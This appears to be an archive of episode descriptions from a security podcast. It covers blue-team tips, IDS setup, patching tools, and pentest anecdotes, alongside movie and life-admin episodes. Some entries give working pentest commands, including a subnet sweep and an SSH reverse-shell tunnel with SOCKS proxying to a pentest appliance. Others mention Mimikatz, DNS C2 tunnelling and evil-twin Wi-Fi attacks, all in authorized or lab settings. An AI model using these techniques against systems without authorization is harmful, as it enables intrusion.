I'm back from Vegas! My talk went really well and I'm excited to tell you about it in today's episode. First, some conference/trip highlights: During the ILTACON conference I attended a great talk by Don McMillan about how to infuse humor into your work environment. Really enlightening, and you know those things you hear about how humor lowers blood pressure, increases satisfaction and just overall makes you a more pleasant person to be around? Turns out it's true! On the day before my presentation I got my first experience touring around the Vegas strip, and the people watching did not disappoint. I also saw the Muhammad Ali and Van Gogh exhibits, which were awesome. When it came to the actual talk, everything went really well. The audio/visual stuff all worked perfect, and I felt the content delivery went over well too. People asked a lot of questions and even hung out afterwards to discuss security topics further. There were two big surprises I wasn't expecting, though: A podcast listener was at the conference, and shared with me that after listening to lots of 7MS episodes, he always figured I looked like Jared from Subway. :-( There were super talented artists from a company called Filament did a comic-book style retelling of my talk live as I was doing it. I love crazy-talented people like this, so I was totally geeking out. I reposted the renderings (with their permission) at my personal portfolio site if you wanna check 'em out.

I ran out of time in episode #272 to tell you about why preparing to be a speaker for ILTACON was way more stressful that preparing for Secure360 a few months ago. The main points of difference/stress were: ILTA wanted to see PowerPoint deck progress weekly, whereas with Secure360 it was pretty much "Your talk is accepted - see you at the conference!" ILTA is going to show a "speaker slide" with bio a few minutes before the sessions starts. That way the session is focused on content (and probably avoids people who like to talk about themselves too much :-) ILTA requested my PowerPoint and handouts a few weeks before the session so they could put on their Web site for attendees to see. Although that put some pressure on me to get content done early, I think it's great because presumably some people at the talk will have screened the content and therefore be more tuned in.

This is part 2 of a series focusing on public speaking - specifically for the ILTACON conference happening in Vegas this week. In this episode I share a high-level walkthrough of my talk and the 10 "Blue Team on a Budget" tips that the talk will focus on. These tips include: Turning up Windows auditing and PowerShell logging Installing Sysmon Installing Security Onion Don't put too much faith in endpoint protection Keep an eye on Active Directory Install RITA Deploy a Canary Use strong passwords Install LAPS Scan and patch all your things

Seems like every business I meet with needs some sort of help in the patching department. Maybe they've got the Microsoft OS side of the house under control, but the third-party stuff is lacking. Or vice-versa. Either way, the team I work with is excited to kick the tires of some popular patching solutions over the next few weeks, and we'll audibly barf up what we learn into this mini-series! Solutions we'll poke around with include: Ninite ManageEngine PDQ Deploy PS: None of these solutions are sponsoring 7MS. They're just popular patching solutions we're trying out to learn more about 'em and give you the pros/cons we discover! In today's episode I dive a bit into... Ninite Pros Cheap Does one thing, and does it well Been around for a long time Cloud-based - doesn't rely on LAN-side server Cons Only cloud-based...no LAN-side option Requires an agent Agent's only purpose is patching - no extra bells/whistles like remote control or inventorying capability

I spent a bunch of time with Security Onion the last couple week's and have been lovin' it! I ran the install, took all the defaults, ran the updates, and pretty much just let it burn in on my prod (home) environment. After a few days, I went back to check the Security Onion dashboard to check the alerts. There was a bunch of benign stuff (computers pinging each other, Dropbox broadcasting to the network) but also a couple interesting finds - SO caught one of my VMs downloading (intentionally) Invoke-Mimikatz. The dashboard allows you to see transcripts of file downloads like this, as well as a tool called Network Miner to extract a copy of the downloaded file for further analysis. One thing the SO didn't pick up on was the DNS-based C2 tunnel I setup on a test victim client. However, it turns out RITA works great for exactly this type of analysis - it reported the huge number of DNS requests from my victim client to the C2 server. Very helpful info for an incident response situation!

Documentation is super boring, right? Yet it's critical to getting your client/audience excited about making their security better! In this episode I talk about my mixed feelings towards the "big" standards like ISO/NIST/etc. and how a more tactical, down-to-earth documentation approach might be more effective in some cases. And I think we need our documentation to be much more focused on consultation/remediation and not just "Hey, your security sucks...and these next 100+ pages will tell you exactly why!" We can do better! Yes, this episode is like 18 minutes because, well, I guess I'm really passionate about documentation. :-)

Been having a blast working with the beta branch of the Sweet Security project and it anxious to try the latest fixes of the beta branch. Give it a look! I also spent a lot of time the last few nights playing with Security Onion and love it. After zipping through the install wizard and hitting reboot a few times you're pretty much good to go. A few recommendations I'd make after those initial reboots though: Run the soup command to update Security Onion with all the latest packages Use ufw to adjust the internal firewall to allow management from ports other than SSH (which is already preconfigured) On a side note, I think you might have to have your vnic in VMWare set to promiscuous mode in order to allow proper network sniffing. Do a wget http://testmyids.com to ensure Security Onion alerts are coming in the squil dashboard security alerts are pouring in. Also, check out this article for some handy tips on threat hunting with Bro. Next up on my "test this out list" is to setup DNS tunneling to a Digital Ocean droplet I setup, and see if the onion picks up on that, or if I can at least get warned somehow about a high amount of DNS traffic.

Today's episode is a horror story about how I recently lost 5+ years of CrashPlan backups due to what I'm calling a...small clerical error. Yes, this oopsie was 100% my fault, but I think backup providers can do a better job of warning us (via text or automated call rather than just email) before blowing away our life's work.

This week I've continued to play with the awesome Sweet Security IDS solution you can throw on a Raspberry Pi 3. A big update to share is that there is a beta branch which has some cool new features, such as the ability to break the Bro + ELK stack across multiple machines. I also lost a lot of sleep these last few days playing with Security Onion and will do a future episode focusing only on that!

I've been wanting to get a Bro IDS installed for a long time now - and for several reasons: It looks fun! My customers have expressed interest It will be part of my upcoming ILTACON session. So this weekend I started getting the hardware portion ready, which includes: Ubiquiti Edge Router X (~$99) TP-Link TL-SG105E (~$35) CanaKit Raspberry Pi 3 Complete Starter Kit (~$70) If you need additional information such as screenshots/configs etc to get the VLANs passing properly from the Edge Router X to TP-LINK switch, let me know. Otherwise for now I'm just focusing on crafting content for part 2, where we'll dive into actually turning the Pi into a Bro sensor using Sweet Security.

I was pleasantly surprised to see a Wordpress site fall into a pentest scope this past week. One helpful tool to get familiar with when attacking Wordpress sites is wpscan, which is built right into Kali - or you can grab it from GitHub. Get familiar with the command line flags as they can help you conduct a more gentle scan that recovers from site errors/disconnections more easily. Specifically, read up on these options: --throttle - for example, I've been using --throttle 1000 in order to be a bit less intense on my target site --request-timeout and --connect-timeout help your scan recover smoothly from site errors/timeouts Also, if you find yourself in a situation where you're testing a production Wordpress sight (not recommended), consider setting up a free up/downtime alert via a free service like Uptime Robot so you can get emails if the site ever poops out. That certainly beats hitting F5 in Firefox every 10 seconds :-)

Tell me I can't be the only one who regularly wants to combine a bunch of small Nessus scans files into a big fat Nessus scan file, and then make pretty pictures/graphs/summaries that the customer can easily understand? Over the last few weeks I must've tried every Powershell and Python script I could get my hands on, yet still didn't find the magic bullet solution. That is, until I found this little beauty of a tool: NamicSoft. It's a $65 tool for Windows that will not only combine multiple Nessus files into one huge file, but it offers a ton of export/reporting features to make the Nessus data more valuable. Oh, and it can also digest Burp and Nexpose data as well! More on today's episode...

Through kind of a weird series of events, I have an opportunity to speak at ILTACON this summer in Vegas (baby!). I'll be talking about some things you can do if you suspect your perimeter is breached, as well as low-hanging fruit you can implement to better defend against breaches. I'm pumped. And I've done the most important part and chosen a PowerPoint theme: A Few Good Men :-) I've spoken with some of you in the past and know a few of you spend your days and sleepless nights hunting threats. If so I'd love to talk to you to get some creative ideas as it relates to crafting the session content.

This week I had the fun opportunity to do a "blind" network security assessment - where basically we had to step into a network we'd never seen before and make some security posture recommendations. I've found that the following software/hardware is quite helpful for this type of assessment: The PwnPulse helps a ton in scanning wired and wireless networks...and even Bluetooth! I've covered the Pulse in past episodes - check out part 1 and part 2. Network Detective will do a ton of helpful Active Directory enumeration and point out potential red flags, such as: Accounts that haven't been logged into for a long time Accounts with passwords that haven't been refreshed in a long time Privileged groups that need review (Domain Admins, Enterprise Admins, etc.) AD policy issues (*warning: by default Network Detective only pulls back a few policies by default. Check out scripts such as my Environment Check to grab a dump of all GPOs. Thycotic Privileged Account Discovery is a free tool that can crawl AD workstations and enumerate the local administrator accounts on each machine. It makes a good case for implementing LAPS.

I'm continuing to love the our PwnPro and had a chance to use it on a customer assessment this week. For the most part the setup/install was a breeze. Just had a few hiccups that the Pwnie support team straightened me out on right away. In the episode I mention some command line tools and syntax that helped me work with the Pulse. One was using fping to sweep large subnets and accurately find live hosts: fping -a -g 10.0.5.0/16 > blah.txt Then, to setup the reverse shell, I just forwarded port 22 from my Ubiquiti gear to my internal Kali host, and then ran this to make the reverse connection: ssh pwnie@localhost -p 3333 Lastly, to setup the reverse shell so you can proxy Web traffic to an alternate host/port, such as the Nessus port, setup your shell like so: ssh pwnie@localhost -p 3333 -ND 8080 Then leave that window open and setup your Web browser so that you do a SOCKS5 proxy to localhost:8080. Finally, visit http://ip.of.your.host:XXXX. So if your Pulse was 1.2.3.4 and had Nessus running, you'd visit https://1.2.3.4:8834. Enjoy!

Warning! Warning! This is an off-topic episode! I try really hard to create valuable weekly content about IT/security. However, sometimes a virtual grenade goes off in my life and prevents me from having the necessary time/resources to get my act together. This has been one of those weeks. :-) So today I'm going off-topic and talking about an alleged burglary of some electronics at my home. And once we identified the culprit, wow...nobody was more surprised than me.

Intro I mentioned last week that I was speaking at the Secure360 conference here in the Twin Cities, and at that time I was preparing a talk called Pentesting 101: No Hoodie Required. I was so nervous that I've basically spent the last week breathing heavily into paper bags and wishing I was on sedatives. But I have good news to report in today's episode, friends! The talk was very well received and the attendees didn't get out torches and pitchforks! #winning! So today's episode (audio below) talks more about the public speaking experiences and highlights some lessons learned: Things I'd do again next time I'd not tempt the demo gods and still pre-record my hacking movies ahead of time. I saw some people do live demos of very technical things and it did not go well for a few of them :-( I would still spend way too many hours cutting together my movies in iMovie so that they followed a good tempo when presented live I would still have a copy of my presentation on two different laptops, 3 USB thumb drives, a cloud copy, and a copy sent to the Secure 360 folks just in case. Backups, backups, backups - am I right? What I'd do differently next time I'd hopefully have the preso done a few days (weeks, even!) ahead of time and practice it in front of colleagues to get some feedback. I'd still have a theme to the presentation, but rather than something specific like Terminator 2, maybe I'd go even more general and pick a movie/character that could appeal even more to the masses. I wouldn't worry so much about having a presentation that "nails it" for everybody. That's just not possible! We're all coming from different backgrounds and skillsets. It's not gonna be a home run for everybody.

The nervous butterflies are chewing up my organs this week. Why? Because I'm speaking at Secure360 next Tuesday and Wednesday. I'm trying to build a presentation that: Appeals to both techie nerds like me, as well as regular human people Strikes a healthy balance between fun and informative So, my outline is roughly as follows: Intros Lets talk about pentesting vs. vulnerability scans Build your own hackin' lab for $500! Good/bad training (CEH vs. OSCP) Lets hack some stuff following a methodology! Tune in today's episode for more...

So a few weeks ago I did an episode about the AlienVault Certified Security Engineer certification, and last Friday I took a stab at the test. I failed. It kicked my butt. Today I'm here to both rant about the unfairness of the test and offer you some study tips so you don't suffer a similar fate. P.S. - you should definitely check out this blog as it's one of the few valuable study guides I could find out there on the Interwebs.

I'm kicking the tires on the PwnPro which is an all-in-one wired, wireless and Bluetooth assessment and pentesting tool. Upon getting plugged into a network, it peers with a cloud portal and lets you assess and pentest from the comfort of your jammies back at your house! Oh, and did I mention it runs Kali on the back end? Delicious. Today's episode dives into some of what I've been learning about the PwnPro as I run it through its paces at work and warm it up for our first customer assessment...

I've been working with the Bash Bunny for the past few weeks in preparation for a presentation/demo I'm doing in a few weeks. Today I want to talk about what the Bunny is, the cool things it can do, and some of my favorite payloads. Also, I started thinking about what conversation topics spawn from a demo of the Bunny. Specifically, I want to know how people would defend against the Bunny using AD policies, peripheral controls, etc. Check out the Hak5 thread I started about this, as it has got some great ideas.

Find the show notes here!

Show notes are here.

Show notes are here

Show notes for today's episode can be found here!

Show notes are here.

Show notes are here.

Show notes are here.

Site notes are here. Enjoy.

Show notes are here.

Show notes are here

Here are today's show notes!

We've reached the end of this series, and I come into this final chapter bearing good news: I have a job! So in today's episode, I just wanted to kick back and share some cool things I'm working on as I ramp up in this new adventure (and that will also provide good topics for future episodes): Webapp pentest tool bake-off In the next week I'll be evaluating the following for a more general/automatic Webapp scans: Netsparker HP WebInspect Qualys AppSpider SIEM comparison We're looking at several tools to do both on-prem and managed SIEM solutions. If you've got recommendations or experiences to share I would love to hear them - please contact me. Thanks in advance!

Show notes are here

Show notes are here.

Show notes: https://7ms.us/7ms-239-bye-bye-dream-job-part-1

Show notes: https://7ms.us/7ms-238-network-monitoring-101-part-2-nmap-papertrailapp-and-opencanary

Show notes: https://7ms.us/7ms-237-network-monitoring-101-part-1-nessus

Show notes: https://7ms.us/7ms-236-from-derp-to-domain-admin-with-moveit-central

Show notes: https://7ms.us/7ms-235-pwning-billy-madison

Show notes: https://7ms.us/7ms-234-pentesting-owasp-juice-shop-part5

Show notes: https://7ms.us/7ms-233-pentesting-owasp-juice-shop-part-4/

Show notes: https://7ms.us/7ms-232-pentesting-owasp-juice-shop-part-3

Show notes: https://7ms.us/7ms-231-pentesting-owasp-juice-shop-part-2/

Show notes: https://7ms-230-pentesting-owasp-juice-shop-part-1

Show notes: https://7ms.us/7ms-229-intro-to-docker-for-pentesters

Show notes: https://7ms.us/7ms-228-fun-with-bettercap/

Show notes: https://7ms.us/7ms-227-lets-encrypt-installing-ssl-certs-for-nessus-and-ubiquiti-unifi-2/

Show notes: https://7ms.us/7ms-226-diy-500-pentesting-lab-part-3/

Show notes: https://7ms.us/7ms-225-diy-500-pentesting-lab-part-2/

Show notes: https://7ms.us/7ms-224-diy-500-pentesting-lab-part-1/

Show notes: https://7ms.us/7ms-223-vulnhub-walkthrough-tommy-boy/

Show notes: https://7ms.us/7ms-222-off-topic-the-final-chapter/

Show notes: https://7ms.us/7ms-221-news-and-links-roundup/

Show notes: https://7ms.us/7ms-220-installing-ubiquiti-edgerouter-x-and-ap-part-3/

Show notes: https://7ms.us/7ms-219-news-and-links-roundup/

Show notes: https://7ms.us/7ms-218-off-topic-my-top-5-favorite-and-least-favorite-things-about-the-division/

Show notes: https://7ms.us/7ms-217-installing-ubiquiti-edgerouter-x-and-ap-part-2/

Show notes: https://7ms.us/7ms-216-news-and-links-roundup/

Here you can provide a detailed description about your podcast. You may wish to include: topics that will be discussed, your episode schedule, who hosts the show, any guests that have or will appear and what kind of people may enjoy your show.

Show notes: https://7ms.us/7ms-214-news-and-links-roundup/

Show notes: https://7ms.us/7ms-213-building-a-vulnerable-vm-the-prequel/

Show notes: https://7ms.us/7ms-211-news-and-links-roundup/

Show notes: https://7ms.us/7ms-211-off-topic-it-horror-stories-part-2/

Show notes: https://7ms.us/7ms-210-vulnhub-walkthrough-mr-robot/

Show notes: https://7ms.us/7ms-209-news-and-links-roundup/

Show notes: https://7ms.us/7ms-208-off-topic-the-jackwagon-who-stole-my-drums/

Show notes: https://7ms.us/7ms-207-vulnhub-walkthrough-sidney/

Show notes: https://7ms.us/7ms-206-vulnhub-walkthrough-stapler/

Show notes here: https://7ms.us/7ms-205-news-and-links-roundup/

Show notes: https://7ms.us/7ms-204-off-topic-it-horror-stories/

Show notes: https://7ms.us/7ms-203-vulnhub-walkthrough-fristileaks/

Show notes: https://7ms.us/7ms-202-news-and-links-roundup/

Show notes: https://7ms.us/7ms-201-off-topic-audio-clip-extravaganza/

Show notes here: https://7ms.us/7ms-200-vulnhub-walkthrough-milnet/

Show notes: https://7ms.us/7ms-199-news-and-links-roundup/

Show notes: https://7ms.us/7ms-198-two-pentest-stories/

Show notes: https://7ms.us/7ms-197-vulnhub-walkthrough-sickos-1-2/

Show notes here: https://7ms.us/7ms-196-news-and-links-roundup/

Show notes: https://7ms.us/7ms-195-why-appspider-is-grinding-my-gears/

Show notes here: https://7ms.us/7ms-194-vulnhub-walkthrough-simple/

Show note here: https://7ms.us/7ms-193-news-and-links-roundup/

Show notes here: https://7ms.us/7ms-192-podcast-like-nobodys-listening/

Show notes: https://7ms.us/7ms-191-vulnhub-walkthrough-kevgir/

Show notes: https://7ms.us/7ms-190-infosec-news-and-links-roundup/

Show notes: https://7ms.us/7ms-189-offtopic-reviews-of-the-family-fang-and-tumbledown/

Show notes: https://7ms.us/7ms-188-vulnhub-walkthrough-droopyctf/

Show notes: https://7ms.us/7ms-187-infosec-news-and-links-roundup/

Show notes: https://7ms.us/7ms-186-offtopic-reviews-of-brooklyn-and-the-revenant/

Show notes here: https://7ms.us/7ms-185-vulnhub-walkthrough-lord-of-the-root/

Show notes here: https://7ms.us/7ms-184-infosec-news-and-links-roundup/

Show notes here: https://7ms.us/7ms-183-offtopic-the-invitation/

Show notes here: https://7ms.us/7ms-182-vulnhub-walkthrough-sickos/

Show notes here: https://7ms.us/7ms-181-infosec-news-and-links-roundup/

Show notes here: https://7ms.us/7ms-180-vulnhub-walkthrough-skydog-ctf/

Show notes here: https://7ms.us/7ms-179-bring-new-life-to-an-old-mac-with-osx-server/

Show notes here: https://7ms.us/7ms-178-infosec-news-and-links-roundup/

Show notes are here: https://7ms.us/7ms-177-a-not-totally-sucky-way-to-backup-and-share-photos/

Check out the show notes here: https://7ms.us/7ms-176-diy-ssh-honeypot-with-cowrie-2/

Show notes are here: https://7ms.us/7ms-175-infosec-news-and-links-roundup/

Show notes here: https://7ms.us/7ms-174-diy-ssh-honeypot-with-kippo-part-2/

Show notes here: https://7ms.us/7ms-173-diy-ssh-honeypot-with-kippo/

Show notes here: https://7ms.us/7ms-172-infosec-news-and-links-roundup/

Show notes (actually, MUSIC notes in this case) can be found here: https://7ms.us/7ms-161-off-topic-easter-music/

Show notes are here: https://7ms.us/7ms-170-pentesting-in-a-vacuum-part-3/

Show notes are here: https://7ms.us/7ms-169-infosec-news-and-links-roundup/

Show notes are here! Go to https://7ms.us/7ms-168-upgrading-and-securing-your-digital-ocean-ghost-blog/

Show notes are here: https://7ms.us/7ms-167-my-first-dandy-experience-with-soap-web-services/

Show notes are here: https://7ms.us/7ms-166-infosec-news-and-links-roundup/

Show notes for today's episode are right here: https://7ms.us/7ms-165-diy-podcast/

Check out the show notes for today's episode here: https://7ms.us/7ms-164-pentesting-in-a-vacuum-part-2/

Show notes here: https://7ms.us/7ms-163-infosec-news-and-links-roundup/

Show notes for today's episode are here: https://7ms.us/7ms-162-off-topic-deadpool/

Show notes are here - enjoy! https://7ms.us/7ms-161-diy-wifi-network-graph-and-dojo-scavenger-vulnerable-webapp/

Today's show notes are here: https://7ms.us/7ms-160-friday-infosec-news-and-links-roundup/

Today's show notes are here: https://7ms.us/7ms-159-off-topic-what-size-company-is-right-for-me/

Today's swell show notes are at: https://7ms.us/7ms-158-pentesting-in-a-vacuum/

Today's show notes are here: https://7ms.us/7ms-157-infosec-news-and-links-roundup/

Today's show notes: https://7ms.us/7ms-156-off-topic-3-ways-to-be-a-more-connected-parent/

Here are the show notes for today: https://7ms.us/7ms-155-million-dollar-pentest-idea-notepad-tricks-and-ll-bean-jackets-for-dogs/

Episode show notes are here: https://7ms.us/7ms-154-friday-infosec-news-and-links-roundup/.

Today's episode is a movie review of Ex Machina (how the FRICK do you pronounce that?) and closes out with special musical guest, Sweet Surrender!

This is a mini-review of the Almond 2015 router by Securifi. This is NOT a paid advertisement or endorsement. I just happen to REALLY like this little router.

Here are some of my favorite stories and links for this week! Training opportunities NMAP course from Udemy - $24 for a limited time (I think) How to handle the the thoughtless compliance zombie hordes - by BHIS is coming up Tuesday February 16th from 2-3 ET. The price is free! Pivot Project touts itself as "a portfolio of interesting, practical, enlightening, and often challenging hands-on exercises for people who are trying to improve their mastery of important cybersecurity skills. News It is absurdly easy for attackers to destroy your Web site in 10 minutes. Secure your home network better using advice from the SANS Ouch! newsletter. Chromodo (part of Comodo's Internet Security)disables same-origin policy which basically disables Web security. Wha?! Virus total now looks at firmware images as well. We can soon wave goodbye to Java in the browser forever!. Kinda. Tools Here's a nice SSL/TLS-checking checklist for pentesters. Kali is moving to a rolling release configuration pretty soon. Update yours before April 15!

Preview16 wordsIn today's off-topic episode I review the following movies: Bone Tomahawk Goodnight Mommy Misery Loves Comedy

This episode continues the series on securing your life - making sure all the security stuff related to your life is in order. Today we're particularly focusing on preparing to travel. What if (God forbid) the plane goes down? Who has access to your money, passwords, etc.?

Yep, there are tons of people/blogs/magazines/children/pets who have provided reviews of the Apple Watch. This is mine.

In this episode I talk about how to build a cheap hosted Mutillidae server to safely hack away on while keeping other Internet prowlers out. Here are the basic commands to run to lock down the Digital Ocean droplet's iptables firewall: *Flush existing rules* **sudo iptables -F** *Allow all concurrent connections* **sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT** *Allow specific IPs/hosts to access port 80* **sudo iptables -A INPUT -p tcp -s F.Q.D.N --dport 80 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT** *Allow specific IPs/hosts to access port 22* **sudo iptables -A INPUT -p tcp -s F.Q.D.N --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT** *Block all other traffic:* **sudo iptables -P INPUT DROP** *Provide the VPS loopback access:* **sudo iptables -I INPUT 1 -i lo -j ACCEPT** *Install iptables-persistent to ensure rules survive a reboot:* **sudo apt-get install iptables-persistent** *Start iptables-persistent service* **sudo service iptables-persistent start** *If you make iptables changes after this and they don't seem to stick, do this:* **sudo iptables-save > /etc/iptables/rules.v4** See this Digital Ocean article for more information.

Here are some of my favorite stories and links for this week! If you missed last week's BURN IT ALL! Webcast, it's now online as a Youtube video. There is still time to register for the Real World Web Penetration Testing Webinar. It's(Thursday, January 28 @ 1 p.m. CST) and $25 (cheap!) Trustwave is in big trouble after failing to find hackers under their noses. Their noses mustreally hurt because Mandiant was quick to point out the work done by Trustwave was "woefully inadequate." I'm scared of IoT stuff. Why? Oh, I don't know, because what happens when your Nest fails and leaves your buttcheeks freezing cold?!?!? Or what if hackers steal your doorbell, and thus your wifi password and pwn your network? Thankfully, OWASP now now has a top 10 for IoT stuff too. A researcher found some clever ways to abuse Lastpass with an exploit called Lostpass. Lastpassresponded with a security change wherein a Lastpass authentication from a new device requires approval via email. A new Sysinternals tool helps figure out if you have shady, unsigned files in c:\windows\system32. Oh, and for sure upgrade all your iThings ASAP. Apple patched some ugly security holes.

In today's off-topic episode I review two movies: Sicario and The Walk.

I recently had the opportunity to shoulder-surf with some seasoned Webapp pentesters, and wanted to share what I learned about their tools, techniques and methodologies.

Here are some of my fav' stories and links for this week! * Burn it all...The New Security Fundamentals **(Wednesday, January 20 @ 1 p.m. CST)**: a free Webinar on setting up the "*core technical things you need to do for your security program*." I've attended many Webinars from the BHIS group and they're always informative and humorous. * Real World Web Penetration Testing **(Thursday, January 28 @ 1 p.m. CST)**: a $25 Webinar on going through "*a real world penetration test. We will explore the methodology and procedures Secure Ideas follows as we test web applications. The course will also walk through some tricks and tips on how to focus your testing on likely flaws*." I have seen four of their recorded courses before and found them to be *absolutely* worth the money I spent, so I'm confident this upcoming session will be no exception. * Fortinet SSH backdoor not much to say except if you use any of the affected products, update immediately as they contain an SSH backdoor: * FortiOS v4.3.17 or any later version of FortiOS v4.3 (available as of July 9, 2014) * FortiOS v5.0.8 or any later version of FortiOS v5.0 (available as of July 28, 2014) * Any version of FortiOS v5.2 or v5.4 * Hacker sentenced to 334 years in prison for operating a phishing Web site similar to that of a legit banking Web site. Moral of the story? Don't do that. * Don't use IE 8, 9 or 10 anymore! unless you like to live dangerously.

This off-topic episode covers: * Media servers - I'm a newb in this area and could use your help in setting up a config that actually works! * Making a Murderer - this is a fantastic documentary on Netflix. Stop what you're doing (once you listen to this episode) and watch *immediately* please.

Happy (belated) new year! This episode is more of a "What am I listening to, a PBS telethon?!" kind of thing, and I'm sorry for that. But I want to cover: * Scheduling changes for 2016 - we're gonna be 3 times a week! * A new documentation project I'm working on called BPATTY (Brian's Pentesting and Technical Tips for You) * A way you can support the podcast financially.

This episode talks about some cool video games I've been playing lately: * Metal Gear Solid Phantom Pain (Xbox 360) * Rise of the Tomb Raider (Xbox 360) * Luminocity (iPhone) * Super Mario Maker (Wii U) I recommend 'em all!

Back in episode #93 I talked about securing your life - in other words, asking yourself "What would happen if I was dead right now? Do I have adequate insurance? Are my finances in order? How about estate planning?" This episode continues that train of thought, and I share some new changes I've made in my "life security" department.

Looks like I'm one of the few people in the world who did NOT love this movie. I found it painful slow and claustrophobic. #diappointed.

This off-topic episode talks about one of the most gripping and disturbing documentaries I've ever seen. Welcome to Leith, in a nutshell, asks the question: What would you do if a white supremacist group moved in next door?

One skill that's been kind of a hinderance in my IT/security career is I have exactly zero experience in programming/coding. Zero. Zip. Nil. Nada. Nothing.. But I'm trying to remedy that in 2016 by learnin' me some Python, and I picked up a great book called Python Crash Course, which has been exactly what this newb needed. At the time of publishing, you can get 30% off with the coupon code CRASHCOURSE!

This is a four-part series about my transition to a new job! The topics are as follows: * Part 1: When it may be time to look for a new job (or not) * Part 2: How to stand out during phone screenings and interviews * Part 3: How to gracefully transition from old job to new job * Part 4: Here's what I'm doing in my new gig!

This is a four-part series about my transition to a new job! The topics are as follows: Part 1: When it may be time to look for a new job (or not) Part 2: How to stand out during phone screenings and interviews Part 3: How to gracefully transition from old job to new job Part 4: Here's what I'm doing in my new gig!

This is a four-part series about my transition to a new job! The topics are as follows: Part 1: When it may be time to look for a new job (or not) Part 2: How to stand out during phone screenings and interviews Part 3: How to gracefully transition from old job to new job Part 4: Here's what I'm doing in my new gig!

This is a four-part series about my transition to a new job! The topics are as follows: Part 1: When it may be time to look for a new job (or not) Part 2: How to stand out during phone screenings and interviews Part 3: How to gracefully transition from old job to new job Part 4: Here's what I'm doing in my new gig!

The title says it all. I had two days to pentest a network that probably would've taken two or more people two weeks or more. I laughed. I cried. I had fun.

This episode talks about some fun I had using sqlmap, and how using it in conjunction with Sqlninja makes me happy to be alive.

In this episode I talk about face-planting in my office at the first job I had out of college.

In this episode, I talk about a restaurant infosec assessment I did, and how the recommendations coming out of that assessment didn't fit the standard "mold." I also talk about how being transparent and helpful - and NOT billing clients for every tiny little thing - is king.

This episode covers a few HIPAA tidbits I picked up while preparing for - and executing - a HIPAA security assessment.

This episode isn't about infosec exactly, but it talks about how using public resources like LinkedIn, Twitter and blogs to boost your "brand" (though I hate that word) and help you get more connected to the infosec community, job leads and more!

Way back in episode #93, I talked about things you can do to secure your life (mortgage review, adequate insurance, estate planning, investments, etc.). This episode continues that train of thought and covers: getting the right amount of life insurance, getting the right home/auto coverage, as well as estate planning.

This episode is 90% a rant about how annoying carry-on luggage and air travel can be, and a 10% sprinkling of security sauce mixed in. Hence: sprinkles.

This episode talks about my experience in doing a "redo" security assessment, during which I struggled with the following questions: what's the best way to efficiently correct the erroneous information and make the customer happy without asking ALL the original questions over again? Especially when I have little to no time to prepare for the "redo" interview?

Preview76 wordsThis episode is about a documentary called An Apology to Elephants. It's all about the treatment (or mistreatment) of elephants, and the main message of the movie is, "Please don't go to the circus when it's in town, because you're supporting elephant abuse." Even if that message was a little heavy handed, I certainly will pass on tickets next time a circus act comes through town. You can subscribe to the 7 Minute Security podcast here.

Part 2 concludes my journey in moving 7ms.us from Tumblr to a Digital Ocean droplet running Ghost. Here are the key resources mentioned during the podcast: How to run multiple Ghost blogs on one DI VPS. The key takeaway here was that I had to upgrade to the $10 droplet (I did a "flexible" resize to add more proc/memory) and then the second instance of Ghost installed fine. Turning on CloudFlare SSL was easy. I chose flexible SSL since I wasn't using a "real" cert. I also wrote a rule to force HTTPs for all connections. And, just for grins, I turned on DNSSEC. Because...why not? :-) I picked a strong root password for my DI droplet, but I still don't like the idea of IPs banging on that connection all day and night. I followed this article on installing Fail2Ban to prevent my SSH login from being abused. There are a few IPs that I want to perma-ban, so I'm going to look throughthis article and this one which looks a tad easier. You can subscribe to the 7 Minute Security podcast here.

Announcing the 7MS PURGE! I've got a back log of episodes banked and I want to get caught up for the new year. So I'm going to release one (or maybe more) episodes per day between now and 2016. Plus (spoiler alerts!) in 2016 we're moving to a Monday/Wednesday/Friday release schedule. Yep, 7MS three times a week - thanks for the idea, mom! Subscribe to 7MS on iTunes here.

In this episode I talk about my adventures in moving my brianjohnson.tv Tumblr content over to a Digital Ocean hosted droplet running Ghost. I think you'll want to check this episode out, because in part 2 I talk about the challenges I faced in hosting multiple Ghost instances on one DI droplet. I will also be talking about how to enable CloudFlare SSL (for free!) as well as enabling Fail2Ban to keep annoying people/IPs from brute forcing your SSH root account!

This episode discusses an important and rhetorical (to me) infosec question: Should phishing campaigns be "fair?"

Today I talk about one of the most moving films I've ever seen - a documentary called Alive Inside.

In this episode I complain about getting stuck in NY for two days, and also how to efficiently scan for vulnerabilities when your time is crunched.

We're going off-topic today and talking about the new(ish) movie about Brian Wilson's life called Love and Mercy.

Part 3 on my series about PCI pentesting. Yeah. That.

Yep, this episode is EXACTLY what the title implies.

This episode is about one of my favorite enumeration tools called Sparta - it's built right into Kali 2. And maybe it was in Kali 1 and I totally missed it. But whatevs. I'm happy to have found it now!

The thrilling (?) conclusion of my experience hacking WPA Enterprise.

This episode is about my experience hacking WPA enterprise. Huge mega tiger uppercut thanks to this site for giving me the fixes I needed to get this working on Kali2! https://warroom.securestate.com/index.php/evil-twin-attack-using-hostapd-wpe/

Movie reviews of It Follows and Backcountry.

Here's part 2 (of probably several to come) about my experience with PWAPT (Practical Webapp Pentesting) training last week!

Hey I'm going to PWAPT this week (http://www.eventbrite.com/e/practical-web-application-penetration-testing-with-tim-tomes-lanmaster53-tickets-16718889649), so in this episode I talk about that...and how I'll probably be too info-overloaded to record anything on Thursday :-). Oh, and I had a fun Web app pentest this week that I wanted to share some fun bits on.

A listener wrote in asking some questions about "a day in the life of" a security analyst, so here's my best stab at it!

Today's totally random episode covers: 1. How bad does this podcast's logo suck? 2. Does this podcast need a theme song? 3. Some interesting training I'm taking next week. 4. The Walking Dead - who should die? 5. Metal Gear Solid and my personal godmode strategy.

Hey I just got a LANTurtle and....these are my first impressions!

This is an off-topic episode about the time I was in the holiday comedy super-smash laugh-fest, Jingle All the Way.

I'm a big fan of Recon-ng and you should be too! Check it out - and learn more about Tim Tomes, its creator - at www.lanmaster53.com. And here's the video I mentioned in the podcast - my first look at Recon-ng in action: https://www.youtube.com/watch?v=vkmNTNl6urw

The new(ish) Chris Farley documentary is fantastic - see it!

Ever had an assessment that you thought would be the death of you? I had one recently, but after sticking it out, it turned out to be a blessing in disguise.

Today's episode gives you some tips on how to deliver bad news in an assessment in a positive way. I think that last sentence was a grammatical nightmare.

